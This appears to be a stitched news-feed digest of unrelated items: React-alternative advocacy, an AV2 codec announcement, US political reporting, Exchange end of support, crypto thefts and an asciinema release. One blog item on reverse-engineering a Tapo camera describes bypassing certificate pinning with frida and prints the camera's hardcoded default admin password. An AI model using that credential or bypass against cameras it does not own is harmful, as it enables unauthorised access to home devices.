Solid delivers fine-grained reactivity with JSX familiarity. Updates flow through signals directly to affected DOM nodes, bypassing reconciliation bottlenecks. Strong performance characteristics, limited mindshare. As outlined in Solid’s
comparison guide
, this approach enables more efficient updates than React’s virtual DOM, with precise reactivity that minimizes unnecessary work and improves developer experience through simpler state management.
While prominent case studies are scarcer than for more established frameworks, this is largely due to Solid’s lower adoption. Yet anecdotal reports from early adopters suggest similar transformative gains in update efficiency and code simplicity, waiting to be scaled and shared as more teams experiment.
Qwik: The Resumability Innovation
Qwik uses resumability instead of hydration, enabling instant startup by loading only what the current interaction needs. Ideal for large sites, long sessions, or slow networks. According to Qwik’s
Think Qwik guide
, this is achieved through progressive loading and serializing both state and code. Apps can thus resume execution instantly without heavy client-side bootstrapping, resulting in superior scalability and reduced initial load times compared to traditional frameworks.
Success stories for Qwik may be less visible simply because fewer teams have broken from defaults to try it. But those who have report dramatic improvements in startup times and resource efficiency, indicating a wealth of untapped potential if adoption grows.
All three under-adopted not for lack of merit, but because the default choice blocks trying them out.
Furthermore, React’s API surface area is notably larger and more complex than its alternatives, encompassing concepts like hooks, context, reducers, and memoization patterns that require careful management to avoid pitfalls. This expansive API contributes to higher cognitive load for developers, often leading to bugs from misunderstood dependencies or over-engineering. For example, in Cloudflare’s
September 12, 2025 outage
, a useEffect hook with a problematic dependency array triggered repeated API calls, overwhelming their Tenant Service and causing widespread failures. In contrast, frameworks like Svelte, Solid, and Qwik feature smaller, more focused APIs that emphasize simplicity and web fundamentals, reducing the mental overhead and making them easier to master and maintain.
The Network Effect Prison
React’s dominance creates self-reinforcing barriers. Job postings ask for “React developers” rather than “frontend engineers,” limiting skill diversity. Component libraries and team muscle memory create institutional inertia.
Risk-averse leaders choose the “safe” option. Schools teach what jobs ask for. The cycle continues independent of technical merit.
That’s not healthy competition; it’s ecosystem capture by default.
Breaking the Network Effect
Escaping requires deliberate action at multiple levels. Technical leaders should choose based on constraints and merits, not momentum. Companies can allocate a small innovation budget to trying alternatives. Developers can upskill beyond a single mental model.
Educators can teach framework-agnostic concepts alongside specific tools. Open source contributors can help alternative ecosystems mature.
Change won’t happen automatically. It requires conscious choice.
Framework Evaluation Checklist
To make deliberate choices, use this simple checklist when starting a new project:
Assess Performance Needs
: Evaluate metrics like startup time, update efficiency, and bundle size. Prioritize frameworks with compile-time optimizations if speed is critical.
Team Skills and Learning Curve
: Consider existing expertise but factor in migration paths; many alternatives offer gentle ramps (e.g., Solid’s JSX compatibility with React).
Scaling and Cost of Ownership
: Calculate long-term costs, including maintenance, dependency management, and tech debt. Alternatives often reduce runtime overhead, lowering hosting costs and improving scalability.
Ecosystem Fit
: Balance maturity with innovation; pilot in non-critical areas to test migration feasibility and ROI.
The Standard Counter‑Arguments
“But ecosystem maturity!”
Maturity is valuable, and can also entrench inertia. Age isn’t the same as fitness for today’s constraints.
Additionally, a mature ecosystem often means heavy reliance on third-party packages, which can introduce maintenance burdens like keeping dependencies up-to-date, dealing with security vulnerabilities, and bloating bundles with unused code. While essential in some cases, this flexibility can lead to over-dependence; custom solutions tailored to specific needs are often leaner and more maintainable in the long run. Smaller ecosystems in alternative frameworks encourage building from fundamentals, fostering deeper understanding and less technical debt. Moreover, with AI coding assistants now able to generate precise, custom functions on demand, the barrier to creating bespoke utilities has lowered dramatically. This makes it feasible to avoid generic libraries like lodash or date libraries like Moment or date-fns entirely in favor of lightweight, app-specific implementations.
“But hiring!”
Hiring follows demand. You can de‑risk by piloting alternatives in non‑critical paths, then hiring for fundamentals plus on‑the‑job training.
“But component libraries!”
Framework‑agnostic design systems and Web Components reduce lock-in while preserving velocity.
“But stability!”
React’s evolution from classes to hooks to Server Components demonstrates constant churn, not stability.
Alternative frameworks often provide more consistent APIs.
“But proven at scale!”
jQuery was proven at scale too. Past
success doesn’t guarantee future relevance.
The Broader Ecosystem Harm
Monoculture slows web evolution when one framework’s constraints become de facto limits. Talent spends cycles solving framework-specific issues rather than pushing the platform forward. Investment follows incumbents regardless of technical merit.
Curricula optimize for immediate employability over fundamentals, creating framework-specific rather than transferable skills. Platform improvements get delayed because “React can handle it” becomes a default answer.
The entire ecosystem suffers when diversity disappears.
The Garden We Could Grow
Healthy ecosystems require diversity, not monocultures. Innovation emerges when different approaches compete and cross-pollinate. Developers grow by learning multiple mental models. The platform improves when several frameworks push different boundaries.
Betting everything on one model creates a single point of failure. What happens if it hits hard limits? What opportunities are we missing by not exploring alternatives?
It’s time to choose frameworks based on constraints and merit rather than momentum. Your next project deserves better than React-by-default. The ecosystem deserves the innovation only diversity can provide.
Stop planting the same seed by default. The garden we could cultivate through diverse framework exploration would be more resilient and more innovative than the monoculture we’ve drifted into.
The choice is ours to make.
AOMedia Announces Year-End Launch of Next-Gen Video Codec AV2
The Future of Innovation Is Open: AOMedia Member Survey Highlights Adoption Trends
Wakefield, Mass. — Sept. 15, 2025
—
The Alliance for Open Media (AOMedia)
,
a global collaboration of innovators working together to define and deploy
open standards that power the next generation of media experiences, today
announced the upcoming launch of the next evolution in open video coding: AV2.
Set for a year-end release, AV2 is not only an upgrade to the widely adopted AV1
but also a foundational piece of AOMedia’s future tech stack.
AV2, a generation leap in open video coding and the answer to the world’s growing
streaming demands, delivers significantly better compression performance than
AV1. AV2 provides enhanced support for AR/VR applications, split-screen delivery
of multiple programs, improved handling of screen content, and an ability to
operate over a wider visual quality range. AV2 marks a milestone on the path to
an open, innovative future of media experiences.
“At AOMedia, we believe innovation thrives when it’s open,” said Dr.
Pierre-Anthony Lemieux, Executive Director of AOMedia. “Our standards benefit
from input from innovators worldwide and are developed under a royalty-free
patent policy, bringing next-generation media experiences to more people, faster.
We’re excited to share AV2 with the world, as we continue to lead the way in
shaping the future of media through open collaboration.”
Survey Findings: Widespread Support of AV1 and Planned Adoption of AV2
In conjunction with its 10th anniversary, AOMedia released new member survey
findings that underscore strong industry-wide support for its open innovation
model and the widespread adoption of its technologies.
The survey found that 88% of members ranked AV1 as either “extremely critical”
or “important” to their current or future product roadmaps. AOMedia’s
Adoption Showcase
illustrates the real-world benefits members are achieving through AV1 deployment.
Looking ahead, 53% of AOMedia members surveyed plan to adopt AV2 within 12
months upon its finalization later this year, with 88% expecting to implement it
within the next two years.
AOMedia invites new members to help shape the future of open, high-performance
media standards. To learn more about membership opportunities, contact
membership@aomedia.org
.
Launched in 2015, the Alliance for Open Media (AOMedia) develops open standards
for media — spanning video, audio, still images, and immersive technologies.
AOMedia brings together 49 global innovators — including tech leaders with
decades of media tech experience and some of the world’s largest patent
holders — to support this mission. Its steering committee consists of Amazon,
Apple, Cisco, Google, Intel, Meta, Microsoft, Mozilla, Netflix, NVIDIA, Samsung
Electronics, and Tencent. Learn more at
www.aomedia.org
.
Media Contact
Melissa Bednar
AOMedia Public Relations
mbednar@virtualinc.com
781.876.8962
GOP Rep. Backtracks on Bill That Could Let Marco Rubio Revoke Passports From Israel Critics
Intercept
theintercept.com
2025-09-15 18:34:45
The bill alarmed civil liberties advocates who feared Rubio could use it to punish pro-Palestine Americans.
The post GOP Rep. Backtracks on Bill That Could Let Marco Rubio Revoke Passports From Israel Critics appeared first on The Intercept....
A top Republican
lawmaker in the House of Representatives is backtracking on a proposal that would have given Secretary of State Marco Rubio the power to revoke American citizens’ passports if he decides they have provided “material support” to terrorists.
The proposal from Rep. Brian Mast, R-Fla., sparked a backlash from civil society groups after he introduced it as part of a larger State Department reorganization bill last week.
On Sunday, Mast
introduced a manager’s amendment
that would strip the provision from the bill he introduced days before. The manager’s amendment itself must still be approved at a Wednesday hearing to apply to the larger House bill, which itself faces an uncertain future in the Senate.
Civil liberties supporters celebrated Monday, after warning last week that the bill endangered the right to travel freely.
One advocate had warned
that it essentially granted the secretary of state “thought police” power.
“It’s a really great thing that this provision got struck” said Kia Hamadanchy, an attorney with the American Civil Liberties Union. “It was hugely problematic, created a huge risk of abuse, of politicized enforcement.”
Mast’s office did not immediately respond to a request for comment.
Under Mast’s original proposal, the secretary of state would have been empowered to refuse or revoke passports of people they deem to have materially supported terrorists.
Mast’s amendment would also remove a provision that would allow the secretary of state to revoke passports for people who have been convicted or charged of material support of designated terror groups.
Magnifier lets you zoom in on your surroundings using a connected camera. Accessibility Reader provides a systemwide, customized reading and listening experience. Braille Access creates an all-new interface for braille displays.
9
And Vehicle Motion Cues help reduce motion sickness in moving vehicles.
Family.
Parents can take advantage of a wide set of parental controls designed to keep children safe. These include new enhancements across Communication Limits, Communication Safety, and the App Store.
Journal.
Now on Mac for the most comfortable writing experience, Journal makes it easy to capture and write about everyday moments and special events using photos, videos, audio recordings, places, and more.
Photos.
An updated design lets you quickly access filtering and sorting options and customize the size of Collections tiles so you can view your library just how you like. And with Pinned Collections, you can keep your most-visited ones right at your fingertips.
FaceTime.
Celebrate the people who matter most with a new tiled design that features beautiful and personalized Contact Posters.
Reminders.
With Apple Intelligence, Reminders can suggest tasks, grocery items, and follow-ups based on emails or other text on your device. It can also automatically categorize related reminders into sections within a list.
Games.
The new Games app brings together all the games you have on your Mac. In the Game Overlay, you can adjust system settings, chat with friends, or invite them to play — all without leaving the game. And for developers, Metal 4 brings even more advanced graphics and rendering technologies, like MetalFX Frame Interpolation and Denoising.
Messages.
Create polls and personalize conversations with backgrounds. Redesigned conversation details feature designated sections for contact info, photos, links, location, and more. Typing indicators in groups let you know exactly who is about to chime in. Screening tools detect spam and give you control. And the Add Contact button now appears next to an unknown number in a group.
Passwords.
Easily refer to changes you’ve made to your accounts. Find previous versions of passwords, along with when they were changed.
Notes.
Capture conversations in the Phone app as audio recordings with transcriptions.
10
You can also export a note into a Markdown file.
Microsoft: Exchange 2016 and 2019 reach end of support in 30 days
Bleeping Computer
www.bleepingcomputer.com
2025-09-15 18:04:05
Microsoft has reminded administrators again that Exchange 2016 and Exchange 2019 will reach the end of extended support next month and has provided guidance for decommissioning outdated servers. [...]...
Microsoft has reminded administrators again that Exchange 2016 and Exchange 2019 will reach the end of extended support next month and has provided guidance for decommissioning outdated servers.
According to the company's product lifecycle website, Exchange 2016 reached
mainstream end date
in October 2020, while Exchange 2019's
mainstream support
ended on January 9, 2024.
Microsoft
also reminded
customers in January that Exchange Server 2016 and 2019 will reach the end of support in October.
After October 14, Microsoft will cease providing technical support, including bug fixes for newly discovered issues that may impact the usability and stability of outdated servers.
The company will also stop issuing time zone updates and security fixes for vulnerabilities that may expose servers to security breaches.
"On October 14, 2025, one month from now, Exchange Server 2016 and Exchange Server 2019 will reach end of support. It's critical to upgrade now to remain supported and secure," the Exchange Server engineering team
warned
over the weekend.
"Customer installations of Exchange 2016 and Exchange 2019 will continue to run after October 14, 2025. However, continuing to use these offerings after the end-of-support date invites potential security risks, so we strongly recommend taking action now."
Admins can
perform an in-place upgrade
from Exchange Server 2019 to Exchange Server SE, with the process being identical to installing a Cumulative Update (CU).
Those who still have servers running Exchange 2016 and 2013 are advised to upgrade to Exchange Server SE or first install Exchange 2019, respectively.
"If you are running Exchange 2016, we recommend that you perform a legacy (a.k.a. side-by-side) upgrade to Exchange Server SE and do an in-place upgrade to Exchange Server SE when it is available," Microsoft added.
" If you still have Exchange Server 2013 or earlier in your organization, you must first remove it before you can install Exchange Server 2019 CU15 or upgrade to Exchange Server SE."
Kathy Hochul Endorsed Zohran Mamdani. Will Top Democrats Join Her?
Intercept
theintercept.com
2025-09-15 18:01:30
The New York governor’s support for Mamdani marked a shift in the NYC mayoral race — but top Democrats like Chuck Schumer and Hakeem Jeffries still haven’t weighed in.
The post Kathy Hochul Endorsed Zohran Mamdani. Will Top Democrats Join Her? appeared first on The Intercept....
New York Gov.
Kathy Hochul became the top official in the state to endorse Assembly Member Zohran Mamdani for New York City for mayor on Sunday, marking a shift for a
strident defender of Israel
as mainstream Democrats grapple with
surging public support
for Mamdani’s criticism of the Israeli regime over its ongoing genocide in Gaza.
In an
opinion piece
for the New York Times, Hochul wrote that she and Mamdani shared priorities like making the city more affordable and ensuring strong leadership of the New York Police Department. She also took an oblique shot at Mamdani’s two main competitors: current New York City Mayor Eric Adams, who President Donald Trump’s team has
reportedly pushed
to drop out of the race, and Andrew Cuomo, who would have a better shot at winning if Adams did so. The former governor lost the Democratic primary by just under 13 percentage points
to Mamdani in June.
“In light of the abhorrent and destructive policies coming out of Washington every day, I needed to know the next mayor will not be someone who would surrender one inch to President Trump,” Hochul wrote. Trump,
apparently displeased
with the endorsement, called it “a rather shocking development.”
Hochul’s support for Mamdani followed nearly three months of
hand-wringing
from the de facto leader of New York’s Democratic Party, who has expressed skepticism of Mamdani’s policy proposals that would require tax hikes on the wealthy and more public spending. Now, Hochul’s endorsement sets her apart from the top two Democrats in Congress — Senate Minority Leader Chuck Schumer and House Minority Leader Hakeem Jeffries — who have both declined to weigh in on the most heated race in New York City.
As a result, New York’s Democratic establishment remains split over whether they should rally behind Mamdani, Cuomo, or — seemingly – no one.
Nearly three months after the primary, only four members of the Democratic congressional delegation representing New York City districts have endorsed Mamdani: Reps. Nydia Velázquez, Alexandria Ocasio-Cortez, Jerry Nadler, and Adriano Espaillat. Only Velázquez and Ocasio-Cortez backed Mamdani before his primary win.
“We have a Democratic nominee,” Ocasio-Cortez told
reporters earlier this month
. “Are we a party that rallies behind their nominee, or not?”
Democratic Reps.
George Latimer
, Ritchie Torres, Gregory Meeks, and Tom Suozzi have endorsed Cuomo. Sen. Kirsten Gillibrand and Reps. Dan Goldman, Grace Meng, and Yvette Clarke have not made endorsements in the race.
Urging her fellow New York Democrats to back Mamdani, Ocasio-Cortez has pointed to her support of President Joe Biden during the 2024 presidential election even though he was not her preferred candidate.
“We use our primaries to settle our differences and once we have a nominee, we rally behind that nominee. I am very concerned by the example that is being set by anybody in our party,” Ocasio-Cortez said
earlier this month
. “If an individual doesn’t want to support the party’s nominee now, it complicates their ability to ask voters to support any nominee later.”
Outside the city, Rep. Pat Ryan, a Democrat who represents a swing district in the Hudson Valley, endorsed Mamdani last week. Democratic Rep. Laura Gillen, a moderate from Long Island, was the first Democrat to publicly
denounce
Mamdani’s campaign after his win but has not endorsed a candidate in the race.
Reached for comment, a spokesperson for Jeffries pointed to a
statement
he made to reporters last week: “I certainly will have more to say about the New York City mayor’s race in short order.”
Offices for Schumer, Gillibrand, Goldman, Meng, and Clarke did not immediately respond to requests for comment.
Nadler, who announced this month he will retire at the end of the current congressional session, addressed his change of heart toward Mamdani during an
interview
with WNYC’s Brian Lehrer on September 5. During the primary, Nadler said he would not back Mamdani because of his criticism of Israel’s genocide in Gaza and what Nadler called Mamdani’s lack of experience. Nadler told Lehrer his decision to endorse Mamdani after he won the primary was a no-brainer.
“First, he was the Democratic nominee,” Nadler said. “Second, what are the alternatives? You have the mayor, who’s a crook, and you had Andrew Cuomo, whom I had said should resign from the governorship because he was a repeat sexual predator.”
Goldman, whose
Manhattan district
Mamdani won in June, endorsed state Sen. Zellnor Myrie before the primary and has said he has spoken with Mamdani but
won’t endorse him
without “concrete steps” to assuage fears from Jewish New Yorkers about hate crimes in the city. It’s not clear what further steps Goldman wants to see — Mamdani has
repeatedly said
he takes concerns about antisemitism seriously and that he would take steps to protect all of his constituents — Jewish and otherwise.
Clarke endorsed New York City Council Speaker Adrienne Adams before the primary. Meng, who
did not make an endorsement
prior to the primary,
congratulated
Mamdani on his win in June and a campaign that she said “built coalitions & mobilized underrepresented New Yorkers!” But she stopped short of endorsing Mamdani.
Gustavo Gordillo, co-chair of the New York City Democratic Socialists of America, which supports Mamdani’s campaign, condemned the party establishment for neglecting to rally behind Mamdani.
“Establishment Democrats have no plan to support the workers targeted by Trump’s agenda,” Gordillo said. “If establishment Democrats refuse to get behind Zohran, they’re not just rejecting the vision of an affordable NYC — they’re rejecting the 500,000 voters and counting who are behind Zohran.”
Thorchain founder exploited for $1.35 million
Web3 Is Going Great
web3isgoinggreat.com
2025-09-15 17:47:00
John-Paul Thorbjornsen, the founder of Thorchain and Vultisig, suffered a wallet drain, reportedly after experiencing a video meeting scam from an attacker who had exploited the Telegram account belonging to one of his friends. According to JP, the scammer used a malicious video call link t...
John-Paul Thorbjornsen, the founder of Thorchain and Vultisig, suffered a wallet drain, reportedly after experiencing a video meeting scam from an attacker who had exploited the Telegram account belonging to one of his friends. According to JP, the scammer used a malicious video call link to place malware on his computer, which then exfiltrated private keys for one of his crypto wallets. Some questioned whether he had made up the story, as he immediately began using the story to promote his Vultisig product.
Later that week, Thorbjornsen apparently suffered another loss — this one confirmed on-chain to be around $1.35 million.
According to crypto sleuth zachxbt, the attackers appeared to be a part of North Korean crypto hacking operations. "JP is one of the people whose has greatly benefited financially from the laundering of DPRK hacks/exploits. So it’s a bit poetic he got rekt here by DPRK," he wrote.
Request blocked.
We can't connect to the server for this app or website at this time. There might be too much traffic or a configuration error. Try again later, or contact the app or website owner.
If you provide content to customers through CloudFront, you can find steps to troubleshoot and help prevent this error by reviewing the CloudFront documentation.
Generated by cloudfront (CloudFront)
Request ID: r85cRBKGfk1KrEglwXLgKx9H28pRVZTqElq6S07XEvg1R1obqmrYnw==
Shibarium bridge hit with $2.4 million flash loan attack
Web3 Is Going Great
web3isgoinggreat.com
2025-09-15 17:31:48
A bridge for Shibarium, the layer-2 network for the Shiba Inu project, was exploited for approximately $2.4 million in funds. The attacker bought 4.6 million BONE tokens (the governance token for Shibarium) using a flash loan, then used compromised validator signing keys to take control of ...
A
bridge
for Shibarium, the
layer-2
network for the Shiba Inu project, was exploited for approximately $2.4 million in funds. The attacker bought 4.6 million BONE tokens (the governance token for Shibarium) using a
flash loan
, then used compromised validator signing keys to take control of the majority of validator power. Then, they used that control to drain around 225 ETH and 92.6 billion SHIB, together priced at around $2.4 million at the time of the theft.
The project has paused staking on the network, freezing the BONE tokens borrowed by the attacker, which may limit the attacker's profits.
I recently bought a cheap Tapo indoor camera to see what my dog gets up to when I am out of the house.
What actually followed? I ended up reverse-engineering onboarding flows, decompiling an APK, MITMing TLS sessions, and writing cryptographic scripts.
My main motivation for this project really stemmed from the fact that the camera annoyed me from day one. Setting the camera up in frigate was quite painful, no one really seemed to know how these cameras worked online.
SIDENOTE: If you want 2 way audio to work in frigate you must use the
tapo://
go2rtc configuration for your main stream instead of the usual
rtsp://
. TP-Link are lazy and only implement 2 way audio on their own proprietary API.
One undocumented behavior that tripped me up was that the device’s API is supposed to accept credentials
admin
:
<your-tapo-cloud-password>
after onboarding. However after banging my head against a wall for a few hours I later discovered that if you change your cloud password after onboarding, paired devices don’t get the memo 🙂.
This implied a few things to me that started the cogs turning:
There must be a call made during on-boarding that syncs the device password with the cloud password
The device must either allow unauthenticated calls before this step or have some sort of default password.
So considering my onboarding woes and the fact that I was starting to recoil every time the tapo app tried to jam a “Tapo Care” subscription down my throat, a cloudless onboarding solution for the device was beginning to look more and more desirable.
The first step to cracking this egg was to be be able to snoop on what the app and the camera are saying to each other during onboarding. E.g, establish a man in the middle.
Man in the middle
To man in the middle a phone app, you must be able to route all http(s) traffic via a proxy server you control. Historically this has been quite simple to achieve, simply spin up a proxy on a computer, add the proxy’s self-signed certificate to the phone’s truststore, and configure the phone to point at the proxy.
However, modern phone apps can use a few nasty tricks to render this approach ineffective. Namely they will blatantly ignore proxies, throw the system truststore to the wind and make liberal use of certificate pinning.
The most full-proof technique for generically MITMing an app has therefore become dynamic instrumentation via tools like
frida
. What this allows us to do is force an app to use the proxies and certificates that we tell it to whilst batting aside it’s attempts to do things like certificate pinning.
So the setup ended up looking like this (full setup guide
here
):
---
config:
theme: 'base'
themeVariables:
primaryColor: '#00000000'
primaryTextColor: '#fff'
primaryBorderColor: '#ffffff8e'
lineColor: '#fff'
secondaryColor: '#fff'
tertiaryColor: '#fff'
---
sequenceDiagram
participant A as Tapo App <br>(with frida hooks)
participant L as Laptop <br>(mitmproxy)
participant C as Tapo Camera
A->>L: Request
L->>L: Record request
L->>C: Forward request
C-->>L: Response
L->>L: Record response
L-->>A: Forward response
After spinning up
mitmproxy
, injecting the
frida scripts
, and onboarding the camera, we finally see an initial login flow — before the admin password ever gets changed:
Searching for
"admin"
in JADX gives us many hits but there are a few concentrated in a
CameraOnboardingViewModel
class that look interesting:
The function
m98131y2
appears to be returning a password that is then passed to the
new Account()
call. Following this function up the chain, we hit gold:
We already know
that the device is using
encrypt_type: 3
, so that means our default password is:
TPL075526460603
Teaching mitmproxy new tricks
With the default password now revealed, we have the cards in our hand to derive session keys and decode the
securePassthrough
messages.
The only thing that would help us further is if we had a reference implementation for the authentication flow. This is where
PyTapo
really came in handy.
Using PyTapo as a reference, we could dump the session state and encrypted messages from mitmproxy and write a script to do some static analysis on the decrypted requests and responses, but a really cool feature of
mitmproxy
is that it supports scripting itself.
What this means is that we can pass a python script to mitmproxy, and have it directly decrypt request and response payloads inline whilst running a capture.
So I wrote
tapo_decrypt_pretty.py
which:
Watches for the login handshake (
cnonce
,
nonce
,
device_confirm
)
Derives
lsk
/
ivb
session keys from it
Transparently decrypts subsequent API calls
Pretty-prints them inline in mitmproxy’s UI in
request_decrypted
and
response_decrypted
fields
Dumps them to JSON files for later analysis
Analysing the results
The complete list of calls made by the Tapo app during onboarding were:
changeAdminPassword
— change from default password to the cloud password
connectAp
— join the selected Wi-Fi access point
Everything else was fluff: timezones, record plans, binding to cloud.
Final thoughts
In the end, the prize for all this nonsense was a scrappy little Bash script,
tapo_onboard.sh
, which:
Logs in with the default admin password,
Scans and selects a Wifi access point
Switches off the obnoxious OSD logo on the camera feed,
Enables RTSP/ONVIF capabilities
Changes the admin password,
And finally joins the Wi-Fi.
Peeling this onion left me with a few observations on Tapo’s firmware.
Some endpoints use SHA-256 for hashing, while others cling to MD5 like it’s 2003.
There are
two
public keys used to send passwords to the device — one that is shared with the client and another super secret one that’s hardcoded in the app. The easiest way to figure out which one to use is to flip a coin.
Password syncing between the app and its managed devices is strictly vibe-based.
The whole thing feels like it was cobbled together by a consortium of couch-cryptographers. But then again, it was the cheapest indoor camera on amazon, so what did I expect?
And with all this said I did finally manage to figure out what the dog does when I am away.
She sleeps. On the sofa. Sometimes even in her bed.
Asciinema CLI 3.0 rewritten in Rust, adds live streaming, upgrades file format
I’m happy to announce the release of asciinema CLI 3.0!
This is a complete rewrite of asciinema in Rust, upgrading the recording file
format, introducing terminal live streaming, and bringing numerous improvements
across the board.
In this post, I’ll go over the highlights of the release. For a deeper overview
of new features and improvements, see the
release
notes
and the
detailed
changelog
.
First, let’s get the Rust rewrite topic out of the way. I did it because I felt
like it. But seriously, I felt like it because I prefer working with Rust 100x
more than with Python these days. And this type of code, with syscalls and
concurrency, is way easier to deal with in Rust than in Python. That’s my
experience, YMMV. Anyway, in addition to making me enjoy working with this
component of asciinema again, the rewrite resulted in faster startup, easier
installation (a static binary), and made many new features possible by
integrating
asciinema virtual terminal
(also Rust) into the CLI.
Let’s look at what’s cool and new now.
asciicast v3 file format
The new
asciicast v3
file
format is an evolution of the good old asciicast v2. It addresses several
shortcomings of the previous format that were discovered over the years.
The major change in the new format is the use of intervals (deltas) for timing
session events. v2 used absolute timestamps (measured since session start),
which had its own pros and cons. One often-brought-up issue was the difficulty
of editing the recordings - timestamps of all following events had to be
adjusted when adding/removing/updating events.
Other than timing, the header has been restructured, grouping related things
together, e.g. all terminal-related metadata is now under
term
. There’s also
support for the new
"x"
(exit) event type, for storing the session exit
status. Finally, line comments are allowed by using the
#
character as the
first character on a line.
Here’s an example of a short recording in asciicast v3 format:
The new CLI allows for live streaming of terminal sessions, and provides two
modes for doing so.
Local mode uses built-in HTTP server, allowing people to view the stream on
trusted networks (e.g. a LAN). In this mode no data is sent anywhere, except to
the viewers’ browsers, which may require opening a firewall port. The CLI
bundles the latest version of asciinema player, and uses it to connect to the
stream from the page served by the built-in server.
$ asciinema stream --local
::: asciinema session started
::: Live streaming at http://127.0.0.1:37881
::: Press <ctrl+d> or type 'exit' to end
$ _
Remote mode publishes the stream through an asciinema server (either
asciinema.org or a self-hosted one), which acts as a relay, delivering the
stream to the viewers at a shareable URL.
$ asciinema stream --remote
::: asciinema session started
::: Live streaming at https://asciinema.org/s/TQGS82DwiBS1bYAY
::: Press <ctrl+d> or type 'exit' to end
$ _
The two modes can be used together as well.
Here’s a live stream of
btop
running on one of the asciinema.org servers:
Read more about the streaming architecture and supported protocols
here
.
asciinema player (seen above) supports all the described protocols. To make the
viewing experience smooth and glitch-free, it implements an adaptive buffering
mechanism. It measures network latency in real-time and adjusts the buffer size
constantly, aiming for a good balance between low latency and buffer-underrun
protection.
asciinema server can now record every live stream and turn it into a regular
recording. At the moment, asciinema server running at asciinema.org has stream
recording disabled and a concurrent live stream limit of 1, but you can
self-host the server where recording is enabled and there’s no concurrent
stream limit by default. The limits on asciinema.org may change. I’d like to
first see how the streaming feature affects resource usage (btw, shout-out to
Brightbox
, which provides cloud services for
asciinema.org).
Local-first
In the early versions of asciinema,
asciinema rec
didn’t support saving to a
file - the recording was saved to a tmp file, uploaded to asciinema.org, and
the tmp file was removed. Later on, the CLI got the ability to specify a
filename, which allowed you to save the result of a recording session to a file
in asciicast v1 format and decide whether you want to keep it local only or
publish.
Although optional, the filename argument had long been available. However,
many, many tutorials on the internet (probably including asciinema’s own docs)
showed examples of recording and publishing in one go with
asciinema rec
.
That was fine - many people loved this short path from recording to sharing.
Over the years, I started seeing two problems with this. The first one is that
lots of people still think you must upload to asciinema.org, which is not true.
You can save locally and nothing leaves your machine. The second one is that
the optionality of the filename made it possible to unintentionally publish a
recording, and potentially leak sensitive data. And it’s a completely valid
concern!
Because of that, on several occasions I’ve seen negative comments saying
“asciinema is shady” /m\. It was never shady. It’s just a historical thing. I
just kept the original behavior for backward compatibility. asciinema.org is
not a commercial product - it’s
an
instance of asciinema server, which is
meant to give users an easy way to share, and to give a taste of what you get
when you self-host the server. In fact, I encourage everyone to self-host it,
as the recordings uploaded to asciinema.org are a liability for me (while being
a good promotion of the project :)).
I hope this clears up any confusion and suspicion.
Anyway, many things have changed since the original behavior of
asciinema rec
was implemented, including my approach to sharing my data with cloud
services. These days I self-host lots of services on a server at home, and I
try to avoid cloud services if I can (I’m pragmatic about it though).
The streaming feature was built from the ground up to support the local mode,
which came first, and the remote mode followed.
In asciinema CLI 2.4, released 2 years ago, I made the
upload
command show a
prompt where you have to explicitly make a decision on what to do with the
recording. It looked like this:
$ asciinema rec
asciinema: recording asciicast to /tmp/tmpo8_612f8-ascii.cast
asciinema: press <ctrl-d> or type "exit" when you're done
$ echo hello
hello
$ exit
asciinema: recording finished
(s)ave locally, (u)pload to asciinema.org, (d)iscard
[s,u,d]? _
It was a stopgap and a way to prepare users for further changes that are coming
now.
In 3.0, the filename is always required, and the
rec
command no longer has
upload capability. To publish a recording to asciinema.org or a self-hosted
asciinema server, use the explicit
asciinema upload <filename>
.
More self-hosting-friendly
A related improvement introduced in this release is the new server URL prompt.
When using a command that integrates with asciinema server (
upload
,
stream
,
auth
) for the first time, a prompt is shown, pre-filled with
https://asciinema.org
(for convenience). This lets you choose an asciinema
server instance explicitly and intentionally. The choice is saved for future
invocations.
It was always possible to
point the CLI to another asciinema
server
with a config
file or environment variable, but this new prompt should come in handy
especially when running the CLI in a non-workstation/non-laptop yet interactive
environment, such as a fresh VM or a dev container.
This change should make it easier to use the CLI with your own asciinema
server, and at the same time it doubles as an additional guard preventing
unintended data leaks (to asciinema.org).
Summary
I’m really excited about this release. It’s been in the making for a while, but
it’s out now, and I’m looking forward to seeing what new use-cases and
workflows people will discover with it.
It’s going to take a moment until 3.0 shows up in package repositories for all
supported platforms/distros. Meanwhile, you can download prebuilt binaries for
GNU/Linux and macOS from the
GitHub
release
, or
build
it from source
.
Thanks for reading to this point!
Did you like it? Feel free to send me an email with your feedback to
. You can also reach me on Mastodon at
@ku1ik@hachyderm.io
.
Thanks!
Microsoft to force install the Microsoft 365 Copilot app in October
Bleeping Computer
www.bleepingcomputer.com
2025-09-15 16:59:23
Next month, Microsoft will begin automatically installing the Microsoft 365 Copilot app on Windows devices that have the Microsoft 365 desktop client apps. [...]...
Next month, Microsoft will begin automatically installing the Microsoft 365 Copilot app on Windows devices that have the Microsoft 365 desktop client apps.
The Microsoft 365 Copilot app integrates the AI-powered Copilot assistant with Microsoft 365 suite apps, including Word, Excel, and PowerPoint, as well as other features like Notebooks and AI agents.
While the newly installed app will be added to the Windows Start Menu and enabled by default, IT administrators responsible for managing Microsoft 365 app deployments will be able to opt out in the Apps Admin Center.
Redmond also advised admins to notify their organizations' helpdesk teams and users before the app is forcibly installed on their devices "to reduce confusion and support requests."
The rollout will start in early October and be completed by mid-November; however, the Microsoft 365 Copilot app will not be installed on systems within the European Economic Area (EEA).
"Starting in October 2025, Microsoft will begin automatically installing the Microsoft 365 Copilot app on Windows devices that have Microsoft 365 desktop client apps," the company said in a
Microsoft 365 message center update
on Friday.
"This app provides a centralized entry point for accessing Copilot experiences and AI-powered capabilities across Microsoft 365. This change simplifies access to Copilot and ensures users can easily discover and engage with productivity-enhancing features."
Although many users may notice a new Microsoft 365 Copilot app icon in the Start menu, the application may have already been installed, resulting in no apparent change.
Last month, as part of the same effort to make Copilot more easily available, Microsoft
announced
that it will integrate Microsoft 365 Copilot agents into the Edge sidebar starting in late September 2025, allowing users to access them while using Copilot.
Weeks earlier, it
added a new setting
that allows Microsoft 365 admins to pin the Microsoft 365 Copilot app to the Windows taskbar.
Leaders of Vienna, an Oasis of Affordable Housing, Tour NYC’s Grim Offerings
hellgate
hellgatenyc.com
2025-09-15 16:53:55
Austrian Vice Chancellor Andreas Babler had some advice for New York lawmakers after seeing the city's rent-stabilized apartments up close....
On a recent Monday afternoon, the vice chancellor of Austria, Andreas Babler, peered up at a hole in the sagging ceiling of a dark, unrented South Williamsburg apartment crowded with abandoned furniture and dusty suitcases.
In this write-up, I will walk you through an implementation of a string formatting library for C++ I came up with for my video game.
